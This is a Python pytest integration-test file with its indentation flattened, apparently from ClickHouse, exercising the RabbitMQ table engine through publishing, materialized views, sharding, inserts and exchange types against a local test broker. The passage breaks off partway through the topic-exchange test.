fpath = p.join(p.dirname(__file__), ref_file)
with open(fpath) as reference:
if check:
assert TSV(result) == TSV(reference)
else:
return TSV(result) == TSV(reference)
# Fixtures
@pytest.fixture(scope="module")
def rabbitmq_cluster():
try:
global rabbitmq_id
cluster.start()
rabbitmq_id = instance.cluster.rabbitmq_docker_id
print("rabbitmq_id is {}".format(rabbitmq_id))
instance.query('CREATE DATABASE test')
yield cluster
finally:
cluster.shutdown()
@pytest.fixture(autouse=True)
def rabbitmq_setup_teardown():
wait_rabbitmq_is_available()
wait_rabbitmq_plugin_enabled()
print("RabbitMQ is available - running test")
yield # run test
instance.query('DROP TABLE IF EXISTS test.rabbitmq')
# Tests
@pytest.mark.skip(reason="Flaky")
@pytest.mark.timeout(180)
def test_rabbitmq_select_from_new_syntax_table(rabbitmq_cluster):
instance.query('''
CREATE TABLE test.rabbitmq (key UInt64, value UInt64)
ENGINE = RabbitMQ
SETTINGS rabbitmq_host_port = 'rabbitmq1:5672',
rabbitmq_routing_key_list = 'new',
rabbitmq_exchange_name = 'clickhouse-exchange',
rabbitmq_format = 'JSONEachRow',
rabbitmq_row_delimiter = '\\n';
''')
credentials = pika.PlainCredentials('root', 'clickhouse')
parameters = pika.ConnectionParameters('localhost', 5672, '/', credentials)
connection = pika.BlockingConnection(parameters)
channel = connection.channel()
channel.exchange_declare(exchange='clickhouse-exchange', exchange_type='fanout')
messages = []
for i in range(25):
messages.append(json.dumps({'key': i, 'value': i}))
for message in messages:
channel.basic_publish(exchange='clickhouse-exchange', routing_key='new', body=message)
messages = []
for i in range(25, 50):
messages.append(json.dumps({'key': i, 'value': i}))
for message in messages:
channel.basic_publish(exchange='clickhouse-exchange', routing_key='new', body=message)
connection.close()
result = ''
while True:
result += instance.query('SELECT * FROM test.rabbitmq', ignore_error=True)
if rabbitmq_check_result(result):
break
rabbitmq_check_result(result, True)
@pytest.mark.timeout(180)
def test_rabbitmq_select_from_old_syntax_table(rabbitmq_cluster):
instance.query('''
CREATE TABLE test.rabbitmq (key UInt64, value UInt64)
ENGINE = RabbitMQ('rabbitmq1:5672', 'old', 'clickhouse-exchange', 'JSONEachRow', '\\n');
''')
credentials = pika.PlainCredentials('root', 'clickhouse')
parameters = pika.ConnectionParameters('localhost', 5672, '/', credentials)
connection = pika.BlockingConnection(parameters)
channel = connection.channel()
channel.exchange_declare(exchange='clickhouse-exchange', exchange_type='fanout')
messages = []
for i in range(50):
messages.append(json.dumps({'key': i, 'value': i}))
for message in messages:
channel.basic_publish(exchange='clickhouse-exchange', routing_key='old', body=message)
connection.close()
result = ''
while True:
result += instance.query('SELECT * FROM test.rabbitmq', ignore_error=True)
if rabbitmq_check_result(result):
break
rabbitmq_check_result(result, True)
@pytest.mark.timeout(180)
def test_rabbitmq_select_empty(rabbitmq_cluster):
instance.query('''
CREATE TABLE test.rabbitmq (key UInt64, value UInt64)
ENGINE = RabbitMQ
SETTINGS rabbitmq_host_port = 'rabbitmq1:5672',
rabbitmq_routing_key_list = 'empty',
rabbitmq_format = 'TSV',
rabbitmq_row_delimiter = '\\n';
''')
assert int(instance.query('SELECT count() FROM test.rabbitmq')) == 0
@pytest.mark.timeout(180)
def test_rabbitmq_json_without_delimiter(rabbitmq_cluster):
instance.query('''
CREATE TABLE test.rabbitmq (key UInt64, value UInt64)
ENGINE = RabbitMQ
SETTINGS rabbitmq_host_port = 'rabbitmq1:5672',
rabbitmq_routing_key_list = 'json',
rabbitmq_exchange_name = 'clickhouse-exchange',
rabbitmq_format = 'JSONEachRow'
''')
credentials = pika.PlainCredentials('root', 'clickhouse')
parameters = pika.ConnectionParameters('localhost', 5672, '/', credentials)
connection = pika.BlockingConnection(parameters)
channel = connection.channel()
channel.exchange_declare(exchange='clickhouse-exchange', exchange_type='fanout')
messages = ''
for i in range(25):
messages += json.dumps({'key': i, 'value': i}) + '\n'
all_messages = [messages]
for message in all_messages:
channel.basic_publish(exchange='clickhouse-exchange', routing_key='json', body=message)
messages = ''
for i in range(25, 50):
messages += json.dumps({'key': i, 'value': i}) + '\n'
all_messages = [messages]
for message in all_messages:
channel.basic_publish(exchange='clickhouse-exchange', routing_key='json', body=message)
result = ''
while True:
result += instance.query('SELECT * FROM test.rabbitmq', ignore_error=True)
if rabbitmq_check_result(result):
break
connection.close()
rabbitmq_check_result(result, True)
@pytest.mark.timeout(180)
def test_rabbitmq_csv_with_delimiter(rabbitmq_cluster):
instance.query('''
CREATE TABLE test.rabbitmq (key UInt64, value UInt64)
ENGINE = RabbitMQ
SETTINGS rabbitmq_host_port = 'rabbitmq1:5672',
rabbitmq_routing_key_list = 'csv',
rabbitmq_exchange_name = 'clickhouse-exchange',
rabbitmq_format = 'CSV',
rabbitmq_row_delimiter = '\\n';
''')
credentials = pika.PlainCredentials('root', 'clickhouse')
parameters = pika.ConnectionParameters('localhost', 5672, '/', credentials)
connection = pika.BlockingConnection(parameters)
channel = connection.channel()
channel.exchange_declare(exchange='clickhouse-exchange', exchange_type='fanout')
messages = []
for i in range(50):
messages.append('{i}, {i}'.format(i=i))
for message in messages:
channel.basic_publish(exchange='clickhouse-exchange', routing_key='csv', body=message)
result = ''
while True:
result += instance.query('SELECT * FROM test.rabbitmq', ignore_error=True)
if rabbitmq_check_result(result):
break
connection.close()
rabbitmq_check_result(result, True)
@pytest.mark.skip(reason="Flaky")
@pytest.mark.timeout(180)
def test_rabbitmq_tsv_with_delimiter(rabbitmq_cluster):
instance.query('''
CREATE TABLE test.rabbitmq (key UInt64, value UInt64)
ENGINE = RabbitMQ
SETTINGS rabbitmq_host_port = 'rabbitmq1:5672',
rabbitmq_routing_key_list = 'tsv',
rabbitmq_exchange_name = 'clickhouse-exchange',
rabbitmq_format = 'TSV',
rabbitmq_row_delimiter = '\\n';
''')
credentials = pika.PlainCredentials('root', 'clickhouse')
parameters = pika.ConnectionParameters('localhost', 5672, '/', credentials)
connection = pika.BlockingConnection(parameters)
channel = connection.channel()
channel.exchange_declare(exchange='clickhouse-exchange', exchange_type='fanout')
messages = []
for i in range(50):
messages.append('{i}\t{i}'.format(i=i))
for message in messages:
channel.basic_publish(exchange='clickhouse-exchange', routing_key='tsv', body=message)
result = ''
while True:
result += instance.query('SELECT * FROM test.rabbitmq', ignore_error=True)
if rabbitmq_check_result(result):
break
connection.close()
rabbitmq_check_result(result, True)
@pytest.mark.timeout(180)
def test_rabbitmq_materialized_view(rabbitmq_cluster):
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.rabbitmq (key UInt64, value UInt64)
ENGINE = RabbitMQ
SETTINGS rabbitmq_host_port = 'rabbitmq1:5672',
rabbitmq_routing_key_list = 'mv',
rabbitmq_format = 'JSONEachRow',
rabbitmq_row_delimiter = '\\n';
CREATE TABLE test.view (key UInt64, value UInt64)
ENGINE = MergeTree()
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.rabbitmq;
''')
credentials = pika.PlainCredentials('root', 'clickhouse')
parameters = pika.ConnectionParameters('localhost', 5672, '/', credentials)
connection = pika.BlockingConnection(parameters)
channel = connection.channel()
messages = []
for i in range(50):
messages.append(json.dumps({'key': i, 'value': i}))
for message in messages:
channel.basic_publish(exchange='clickhouse-exchange', routing_key='mv', body=message)
while True:
result = instance.query('SELECT * FROM test.view')
if (rabbitmq_check_result(result)):
break;
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
connection.close()
rabbitmq_check_result(result, True)
@pytest.mark.timeout(180)
def test_rabbitmq_materialized_view_with_subquery(rabbitmq_cluster):
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.rabbitmq (key UInt64, value UInt64)
ENGINE = RabbitMQ
SETTINGS rabbitmq_host_port = 'rabbitmq1:5672',
rabbitmq_routing_key_list = 'mvsq',
rabbitmq_format = 'JSONEachRow',
rabbitmq_row_delimiter = '\\n';
CREATE TABLE test.view (key UInt64, value UInt64)
ENGINE = MergeTree()
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM (SELECT * FROM test.rabbitmq);
''')
credentials = pika.PlainCredentials('root', 'clickhouse')
parameters = pika.ConnectionParameters('localhost', 5672, '/', credentials)
connection = pika.BlockingConnection(parameters)
channel = connection.channel()
messages = []
for i in range(50):
messages.append(json.dumps({'key': i, 'value': i}))
for message in messages:
channel.basic_publish(exchange='clickhouse-exchange', routing_key='mvsq', body=message)
while True:
result = instance.query('SELECT * FROM test.view')
if rabbitmq_check_result(result):
break
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
connection.close();
rabbitmq_check_result(result, True)
@pytest.mark.skip(reason="Flaky")
@pytest.mark.timeout(180)
def test_rabbitmq_many_materialized_views(rabbitmq_cluster):
instance.query('''
DROP TABLE IF EXISTS test.view1;
DROP TABLE IF EXISTS test.view2;
DROP TABLE IF EXISTS test.consumer1;
DROP TABLE IF EXISTS test.consumer2;
CREATE TABLE test.rabbitmq (key UInt64, value UInt64)
ENGINE = RabbitMQ
SETTINGS rabbitmq_host_port = 'rabbitmq1:5672',
rabbitmq_routing_key_list = 'mmv',
rabbitmq_format = 'JSONEachRow',
rabbitmq_row_delimiter = '\\n';
CREATE TABLE test.view1 (key UInt64, value UInt64)
ENGINE = MergeTree()
ORDER BY key;
CREATE TABLE test.view2 (key UInt64, value UInt64)
ENGINE = MergeTree()
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer1 TO test.view1 AS
SELECT * FROM test.rabbitmq;
CREATE MATERIALIZED VIEW test.consumer2 TO test.view2 AS
SELECT * FROM test.rabbitmq;
''')
credentials = pika.PlainCredentials('root', 'clickhouse')
parameters = pika.ConnectionParameters('localhost', 5672, '/', credentials)
connection = pika.BlockingConnection(parameters)
channel = connection.channel()
messages = []
for i in range(50):
messages.append(json.dumps({'key': i, 'value': i}))
for message in messages:
channel.basic_publish(exchange='clickhouse-exchange', routing_key='mmv', body=message)
while True:
result1 = instance.query('SELECT * FROM test.view1')
result2 = instance.query('SELECT * FROM test.view2')
if rabbitmq_check_result(result1) and rabbitmq_check_result(result2):
break
instance.query('''
DROP TABLE test.consumer1;
DROP TABLE test.consumer2;
DROP TABLE test.view1;
DROP TABLE test.view2;
''')
rabbitmq_check_result(result1, True)
rabbitmq_check_result(result2, True)
@pytest.mark.timeout(240)
def test_rabbitmq_big_message(rabbitmq_cluster):
# Create batchs of messages of size ~100Kb
rabbitmq_messages = 1000
batch_messages = 1000
messages = [json.dumps({'key': i, 'value': 'x' * 100}) * batch_messages for i in range(rabbitmq_messages)]
credentials = pika.PlainCredentials('root', 'clickhouse')
parameters = pika.ConnectionParameters('localhost', 5672, '/', credentials)
connection = pika.BlockingConnection(parameters)
channel = connection.channel()
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.rabbitmq (key UInt64, value String)
ENGINE = RabbitMQ
SETTINGS rabbitmq_host_port = 'rabbitmq1:5672',
rabbitmq_routing_key_list = 'big',
rabbitmq_format = 'JSONEachRow';
CREATE TABLE test.view (key UInt64, value String)
ENGINE = MergeTree
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.rabbitmq;
''')
for message in messages:
channel.basic_publish(exchange='clickhouse-exchange', routing_key='big', body=message)
while True:
result = instance.query('SELECT count() FROM test.view')
print("Result", result, "Expected", batch_messages * rabbitmq_messages)
if int(result) == batch_messages * rabbitmq_messages:
break
connection.close()
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
assert int(result) == rabbitmq_messages*batch_messages, 'ClickHouse lost some messages: {}'.format(result)
@pytest.mark.timeout(420)
def test_rabbitmq_sharding_between_channels_publish(rabbitmq_cluster):
NUM_CHANNELS = 5
instance.query('''
CREATE TABLE test.rabbitmq (key UInt64, value UInt64)
ENGINE = RabbitMQ
SETTINGS rabbitmq_host_port = 'rabbitmq1:5672',
rabbitmq_num_consumers = 5,
rabbitmq_format = 'JSONEachRow',
rabbitmq_row_delimiter = '\\n';
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.view (key UInt64, value UInt64)
ENGINE = MergeTree
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.rabbitmq;
''')
time.sleep(1)
i = [0]
messages_num = 10000
credentials = pika.PlainCredentials('root', 'clickhouse')
parameters = pika.ConnectionParameters('localhost', 5672, '/', credentials)
def produce():
connection = pika.BlockingConnection(parameters)
channel = connection.channel()
channel.exchange_declare(exchange='clickhouse-exchange', exchange_type='fanout')
messages = []
for _ in range(messages_num):
messages.append(json.dumps({'key': i[0], 'value': i[0]}))
i[0] += 1
key = str(randrange(1, NUM_CHANNELS))
for message in messages:
channel.basic_publish(exchange='clickhouse-exchange', routing_key=key, body=message)
connection.close()
threads = []
threads_num = 20
for _ in range(threads_num):
threads.append(threading.Thread(target=produce))
for thread in threads:
time.sleep(random.uniform(0, 1))
thread.start()
while True:
result = instance.query('SELECT count() FROM test.view')
time.sleep(1)
print("Result", result, "Expected", messages_num * threads_num)
if int(result) == messages_num * threads_num:
break
for thread in threads:
thread.join()
assert int(result) == messages_num * threads_num, 'ClickHouse lost some messages: {}'.format(result)
@pytest.mark.timeout(420)
def test_rabbitmq_sharding_between_queues_publish(rabbitmq_cluster):
NUM_QUEUES = 4
instance.query('''
CREATE TABLE test.rabbitmq (key UInt64, value UInt64)
ENGINE = RabbitMQ
SETTINGS rabbitmq_host_port = 'rabbitmq1:5672',
rabbitmq_num_queues = 4,
rabbitmq_format = 'JSONEachRow',
rabbitmq_row_delimiter = '\\n';
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.view (key UInt64, value UInt64)
ENGINE = MergeTree
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.rabbitmq;
''')
time.sleep(1)
i = [0]
messages_num = 10000
credentials = pika.PlainCredentials('root', 'clickhouse')
parameters = pika.ConnectionParameters('localhost', 5672, '/', credentials)
def produce():
connection = pika.BlockingConnection(parameters)
channel = connection.channel()
channel.exchange_declare(exchange='clickhouse-exchange', exchange_type='fanout')
messages = []
for _ in range(messages_num):
messages.append(json.dumps({'key': i[0], 'value': i[0]}))
i[0] += 1
key = str(randrange(1, NUM_QUEUES))
for message in messages:
channel.basic_publish(exchange='clickhouse-exchange', routing_key=key, body=message)
connection.close()
threads = []
threads_num = 20
for _ in range(threads_num):
threads.append(threading.Thread(target=produce))
for thread in threads:
time.sleep(random.uniform(0, 1))
thread.start()
while True:
result = instance.query('SELECT count() FROM test.view')
time.sleep(1)
if int(result) == messages_num * threads_num:
break
for thread in threads:
thread.join()
assert int(result) == messages_num * threads_num, 'ClickHouse lost some messages: {}'.format(result)
@pytest.mark.timeout(420)
def test_rabbitmq_sharding_between_channels_and_queues_publish(rabbitmq_cluster):
NUM_CONSUMERS = 10
NUM_QUEUES = 2
instance.query('''
CREATE TABLE test.rabbitmq (key UInt64, value UInt64)
ENGINE = RabbitMQ
SETTINGS rabbitmq_host_port = 'rabbitmq1:5672',
rabbitmq_num_queues = 2,
rabbitmq_num_consumers = 10,
rabbitmq_format = 'JSONEachRow',
rabbitmq_row_delimiter = '\\n';
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.view (key UInt64, value UInt64)
ENGINE = MergeTree
ORDER BY key
SETTINGS old_parts_lifetime=5, cleanup_delay_period=2, cleanup_delay_period_random_add=3;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.rabbitmq;
''')
time.sleep(1)
i = [0]
messages_num = 10000
credentials = pika.PlainCredentials('root', 'clickhouse')
parameters = pika.ConnectionParameters('localhost', 5672, '/', credentials)
def produce():
connection = pika.BlockingConnection(parameters)
channel = connection.channel()
channel.exchange_declare(exchange='clickhouse-exchange', exchange_type='fanout')
messages = []
for _ in range(messages_num):
messages.append(json.dumps({'key': i[0], 'value': i[0]}))
i[0] += 1
key = str(randrange(1, NUM_QUEUES * NUM_CONSUMERS))
for message in messages:
channel.basic_publish(exchange='clickhouse-exchange', routing_key=key, body=message)
connection.close()
threads = []
threads_num = 20
for _ in range(threads_num):
threads.append(threading.Thread(target=produce))
for thread in threads:
time.sleep(random.uniform(0, 1))
thread.start()
while True:
result = instance.query('SELECT count() FROM test.view')
time.sleep(1)
if int(result) == messages_num * threads_num:
break
for thread in threads:
thread.join()
assert int(result) == messages_num * threads_num, 'ClickHouse lost some messages: {}'.format(result)
@pytest.mark.timeout(420)
def test_rabbitmq_read_only_combo(rabbitmq_cluster):
NUM_MV = 5;
NUM_CONSUMERS = 4
instance.query('''
CREATE TABLE test.rabbitmq (key UInt64, value UInt64)
ENGINE = RabbitMQ
SETTINGS rabbitmq_host_port = 'rabbitmq1:5672',
rabbitmq_num_consumers = 4,
rabbitmq_format = 'JSONEachRow',
rabbitmq_row_delimiter = '\\n';
''')
for mv_id in range(NUM_MV):
table_name = 'view{}'.format(mv_id)
print("Setting up {}".format(table_name))
instance.query('''
DROP TABLE IF EXISTS test.{0};
DROP TABLE IF EXISTS test.{0}_mv;
CREATE TABLE test.{0} (key UInt64, value UInt64)
ENGINE = MergeTree()
ORDER BY key;
CREATE MATERIALIZED VIEW test.{0}_mv TO test.{0} AS
SELECT * FROM test.rabbitmq;
'''.format(table_name))
time.sleep(2)
i = [0]
messages_num = 10000
credentials = pika.PlainCredentials('root', 'clickhouse')
parameters = pika.ConnectionParameters('localhost', 5672, '/', credentials)
def produce():
connection = pika.BlockingConnection(parameters)
channel = connection.channel()
channel.exchange_declare(exchange='clickhouse-exchange', exchange_type='fanout')
messages = []
for _ in range(messages_num):
messages.append(json.dumps({'key': i[0], 'value': i[0]}))
i[0] += 1
key = str(randrange(1, NUM_CONSUMERS))
for message in messages:
channel.basic_publish(exchange='clickhouse-exchange', routing_key=key, body=message)
connection.close()
threads = []
threads_num = 20
for _ in range(threads_num):
threads.append(threading.Thread(target=produce))
for thread in threads:
time.sleep(random.uniform(0, 1))
thread.start()
while True:
result = 0
for view in range(NUM_MV):
result += int(instance.query('SELECT count() FROM test.view{0}'.format(view)))
if int(result) == messages_num * threads_num * NUM_MV:
break
time.sleep(1)
for thread in threads:
thread.join()
for mv_id in range(NUM_MV):
table_name = 'view{}'.format(mv_id)
instance.query('''
DROP TABLE IF EXISTS test.{0};
'''.format(table_name))
assert int(result) == messages_num * threads_num * NUM_MV, 'ClickHouse lost some messages: {}'.format(result)
@pytest.mark.timeout(240)
def test_rabbitmq_insert(rabbitmq_cluster):
instance.query('''
CREATE TABLE test.rabbitmq (key UInt64, value UInt64)
ENGINE = RabbitMQ
SETTINGS rabbitmq_host_port = 'rabbitmq1:5672',
rabbitmq_exchange_name = 'insert',
rabbitmq_routing_key_list = 'insert1',
rabbitmq_format = 'TSV',
rabbitmq_row_delimiter = '\\n';
''')
credentials = pika.PlainCredentials('root', 'clickhouse')
parameters = pika.ConnectionParameters('localhost', 5672, '/', credentials)
consumer_connection = pika.BlockingConnection(parameters)
consumer = consumer_connection.channel()
consumer.exchange_declare(exchange='insert_rabbitmq_direct', exchange_type='direct')
result = consumer.queue_declare(queue='')
queue_name = result.method.queue
consumer.queue_bind(exchange='insert_rabbitmq_direct', queue=queue_name, routing_key='insert1')
values = []
for i in range(50):
values.append("({i}, {i})".format(i=i))
values = ','.join(values)
while True:
try:
instance.query("INSERT INTO test.rabbitmq VALUES {}".format(values))
break
except QueryRuntimeException as e:
if 'Local: Timed out.' in str(e):
continue
else:
raise
insert_messages = []
def onReceived(channel, method, properties, body):
i = 0
insert_messages.append(body.decode())
if (len(insert_messages) == 50):
channel.stop_consuming()
consumer.basic_qos(prefetch_count=50)
consumer.basic_consume(onReceived, queue_name)
consumer.start_consuming()
consumer_connection.close()
result = '\n'.join(insert_messages)
rabbitmq_check_result(result, True)
@pytest.mark.timeout(240)
def test_rabbitmq_many_inserts(rabbitmq_cluster):
instance.query('''
DROP TABLE IF EXISTS test.rabbitmq_many;
DROP TABLE IF EXISTS test.view_many;
DROP TABLE IF EXISTS test.consumer_many;
CREATE TABLE test.rabbitmq_many (key UInt64, value UInt64)
ENGINE = RabbitMQ
SETTINGS rabbitmq_host_port = 'rabbitmq1:5672',
rabbitmq_routing_key_list = 'insert2',
rabbitmq_format = 'TSV',
rabbitmq_row_delimiter = '\\n';
CREATE TABLE test.view_many (key UInt64, value UInt64)
ENGINE = MergeTree
ORDER BY key
SETTINGS old_parts_lifetime=5, cleanup_delay_period=2, cleanup_delay_period_random_add=3;
CREATE MATERIALIZED VIEW test.consumer_many TO test.view_many AS
SELECT * FROM test.rabbitmq_many;
''')
messages_num = 1000
def insert():
values = []
for i in range(messages_num):
values.append("({i}, {i})".format(i=i))
values = ','.join(values)
while True:
try:
instance.query("INSERT INTO test.rabbitmq_many VALUES {}".format(values))
break
except QueryRuntimeException as e:
if 'Local: Timed out.' in str(e):
continue
else:
raise
threads = []
threads_num = 20
for _ in range(threads_num):
threads.append(threading.Thread(target=insert))
for thread in threads:
time.sleep(random.uniform(0, 1))
thread.start()
while True:
result = instance.query('SELECT count() FROM test.view_many')
time.sleep(1)
if int(result) == messages_num * threads_num:
break
instance.query('''
DROP TABLE IF EXISTS test.rabbitmq_many;
DROP TABLE IF EXISTS test.consumer_many;
DROP TABLE IF EXISTS test.view_many;
''')
for thread in threads:
thread.join()
assert int(result) == messages_num * threads_num, 'ClickHouse lost some messages: {}'.format(result)
@pytest.mark.timeout(240)
def test_rabbitmq_sharding_between_channels_and_queues_insert(rabbitmq_cluster):
instance.query('''
DROP TABLE IF EXISTS test.view_sharding;
DROP TABLE IF EXISTS test.consumer_sharding;
CREATE TABLE test.rabbitmq_sharding (key UInt64, value UInt64)
ENGINE = RabbitMQ
SETTINGS rabbitmq_host_port = 'rabbitmq1:5672',
rabbitmq_num_consumers = 5,
rabbitmq_num_queues = 2,
rabbitmq_format = 'TSV',
rabbitmq_row_delimiter = '\\n';
CREATE TABLE test.view_sharding (key UInt64, value UInt64)
ENGINE = MergeTree
ORDER BY key
SETTINGS old_parts_lifetime=5, cleanup_delay_period=2, cleanup_delay_period_random_add=3;
CREATE MATERIALIZED VIEW test.consumer_sharding TO test.view_sharding AS
SELECT * FROM test.rabbitmq_sharding;
''')
messages_num = 10000
def insert():
values = []
for i in range(messages_num):
values.append("({i}, {i})".format(i=i))
values = ','.join(values)
while True:
try:
instance.query("INSERT INTO test.rabbitmq_sharding VALUES {}".format(values))
break
except QueryRuntimeException as e:
if 'Local: Timed out.' in str(e):
continue
else:
raise
threads = []
threads_num = 20
for _ in range(threads_num):
threads.append(threading.Thread(target=insert))
for thread in threads:
time.sleep(random.uniform(0, 1))
thread.start()
while True:
result = instance.query('SELECT count() FROM test.view_sharding')
time.sleep(1)
if int(result) == messages_num * threads_num:
break
instance.query('''
DROP TABLE IF EXISTS test.rabbitmq_sharding;
DROP TABLE IF EXISTS test.consumer_sharding;
DROP TABLE IF EXISTS test.view_sharding;
''')
for thread in threads:
thread.join()
assert int(result) == messages_num * threads_num, 'ClickHouse lost some messages: {}'.format(result)
@pytest.mark.timeout(420)
def test_rabbitmq_overloaded_insert(rabbitmq_cluster):
instance.query('''
DROP TABLE IF EXISTS test.view_overload;
DROP TABLE IF EXISTS test.consumer_overload;
CREATE TABLE test.rabbitmq_overload (key UInt64, value UInt64)
ENGINE = RabbitMQ
SETTINGS rabbitmq_host_port = 'rabbitmq1:5672',
rabbitmq_num_consumers = 10,
rabbitmq_format = 'TSV',
rabbitmq_row_delimiter = '\\n';
CREATE TABLE test.view_overload (key UInt64, value UInt64)
ENGINE = MergeTree
ORDER BY key
SETTINGS old_parts_lifetime=5, cleanup_delay_period=2, cleanup_delay_period_random_add=3;
CREATE MATERIALIZED VIEW test.consumer_overload TO test.view_overload AS
SELECT * FROM test.rabbitmq_overload;
''')
messages_num = 100000
def insert():
values = []
for i in range(messages_num):
values.append("({i}, {i})".format(i=i))
values = ','.join(values)
while True:
try:
instance.query("INSERT INTO test.rabbitmq_overload VALUES {}".format(values))
break
except QueryRuntimeException as e:
if 'Local: Timed out.' in str(e):
continue
else:
raise
threads = []
threads_num = 5
for _ in range(threads_num):
threads.append(threading.Thread(target=insert))
for thread in threads:
time.sleep(random.uniform(0, 1))
thread.start()
while True:
result = instance.query('SELECT count() FROM test.view_overload')
time.sleep(1)
print("Result", int(result), "Expected", messages_num * threads_num)
if int(result) == messages_num * threads_num:
break
instance.query('''
DROP TABLE IF EXISTS test.rabbitmq_overload;
DROP TABLE IF EXISTS test.consumer_overload;
DROP TABLE IF EXISTS test.view_overload;
''')
for thread in threads:
thread.join()
assert int(result) == messages_num * threads_num, 'ClickHouse lost some messages: {}'.format(result)
@pytest.mark.timeout(420)
def test_rabbitmq_direct_exchange(rabbitmq_cluster):
instance.query('''
DROP TABLE IF EXISTS test.destination;
CREATE TABLE test.destination(key UInt64, value UInt64,
_consumed_by LowCardinality(String))
ENGINE = MergeTree()
ORDER BY key
SETTINGS old_parts_lifetime=5, cleanup_delay_period=2, cleanup_delay_period_random_add=3;
''')
num_tables = 5
for consumer_id in range(num_tables):
print("Setting up table {}".format(consumer_id))
instance.query('''
DROP TABLE IF EXISTS test.direct_exchange_{0};
DROP TABLE IF EXISTS test.direct_exchange_{0}_mv;
CREATE TABLE test.direct_exchange_{0} (key UInt64, value UInt64)
ENGINE = RabbitMQ
SETTINGS rabbitmq_host_port = 'rabbitmq1:5672',
rabbitmq_num_consumers = 5,
rabbitmq_exchange_name = 'direct_exchange_testing',
rabbitmq_exchange_type = 'direct',
rabbitmq_routing_key_list = 'direct_{0}',
rabbitmq_format = 'JSONEachRow',
rabbitmq_row_delimiter = '\\n';
CREATE MATERIALIZED VIEW test.direct_exchange_{0}_mv TO test.destination AS
SELECT key, value, '{0}' as _consumed_by FROM test.direct_exchange_{0};
'''.format(consumer_id))
i = [0]
messages_num = 1000
credentials = pika.PlainCredentials('root', 'clickhouse')
parameters = pika.ConnectionParameters('localhost', 5672, '/', credentials)
connection = pika.BlockingConnection(parameters)
channel = connection.channel()
channel.exchange_declare(exchange='direct_exchange_testing', exchange_type='direct')
messages = []
for _ in range(messages_num):
messages.append(json.dumps({'key': i[0], 'value': i[0]}))
i[0] += 1
key_num = 0
for num in range(num_tables):
key = "direct_" + str(key_num)
key_num += 1
for message in messages:
mes_id = str(randrange(10))
channel.basic_publish(
exchange='direct_exchange_testing', routing_key=key,
properties=pika.BasicProperties(message_id=mes_id), body=message)
connection.close()
while True:
result = instance.query('SELECT count() FROM test.destination')
time.sleep(1)
if int(result) == messages_num * num_tables:
break
for consumer_id in range(num_tables):
instance.query('''
DROP TABLE IF EXISTS test.direct_exchange_{0};
DROP TABLE IF EXISTS test.direct_exchange_{0}_mv;
'''.format(consumer_id))
instance.query('''
DROP TABLE IF EXISTS test.destination;
''')
assert int(result) == messages_num * num_tables, 'ClickHouse lost some messages: {}'.format(result)
@pytest.mark.timeout(420)
def test_rabbitmq_fanout_exchange(rabbitmq_cluster):
instance.query('''
DROP TABLE IF EXISTS test.destination;
CREATE TABLE test.destination(key UInt64, value UInt64,
_consumed_by LowCardinality(String))
ENGINE = MergeTree()
ORDER BY key;
''')
num_tables = 5
for consumer_id in range(num_tables):
print("Setting up table {}".format(consumer_id))
instance.query('''
DROP TABLE IF EXISTS test.fanout_exchange_{0};
DROP TABLE IF EXISTS test.fanout_exchange_{0}_mv;
CREATE TABLE test.fanout_exchange_{0} (key UInt64, value UInt64)
ENGINE = RabbitMQ
SETTINGS rabbitmq_host_port = 'rabbitmq1:5672',
rabbitmq_num_consumers = 5,
rabbitmq_routing_key_list = 'key_{0}',
rabbitmq_exchange_name = 'fanout_exchange_testing',
rabbitmq_exchange_type = 'fanout',
rabbitmq_format = 'JSONEachRow',
rabbitmq_row_delimiter = '\\n';
CREATE MATERIALIZED VIEW test.fanout_exchange_{0}_mv TO test.destination AS
SELECT key, value, '{0}' as _consumed_by FROM test.fanout_exchange_{0};
'''.format(consumer_id))
i = [0]
messages_num = 1000
credentials = pika.PlainCredentials('root', 'clickhouse')
parameters = pika.ConnectionParameters('localhost', 5672, '/', credentials)
connection = pika.BlockingConnection(parameters)
channel = connection.channel()
channel.exchange_declare(exchange='fanout_exchange_testing', exchange_type='fanout')
messages = []
for _ in range(messages_num):
messages.append(json.dumps({'key': i[0], 'value': i[0]}))
i[0] += 1
key_num = 0
for message in messages:
mes_id = str(randrange(10))
channel.basic_publish(
exchange='fanout_exchange_testing', routing_key='',
properties=pika.BasicProperties(message_id=mes_id), body=message)
connection.close()
while True:
result = instance.query('SELECT count() FROM test.destination')
time.sleep(1)
if int(result) == messages_num * num_tables:
break
for consumer_id in range(num_tables):
instance.query('''
DROP TABLE IF EXISTS test.fanout_exchange_{0};
DROP TABLE IF EXISTS test.fanout_exchange_{0}_mv;
'''.format(consumer_id))
instance.query('''
DROP TABLE IF EXISTS test.destination;
''')
assert int(result) == messages_num * num_tables, 'ClickHouse lost some messages: {}'.format(result)
@pytest.mark.timeout(420)
def test_rabbitmq_topic_exchange(rabbitmq_cluster):
instance.query('''
DROP TABLE IF EXISTS test.destination;
CREATE TABLE test.destination(key UInt64, value UInt64,
_consumed_by LowCardinality(String))
ENGINE = MergeTree()
ORDER BY key;
''')
num_tables = 5
for consumer_id in range(num_tables):
print("Setting up table {}".format(consumer_id))
instance.query('''
DROP TABLE IF EXISTS test.topic_exchange_{0};
DROP TABLE IF EXISTS test.topic_exchange_{0}_mv;
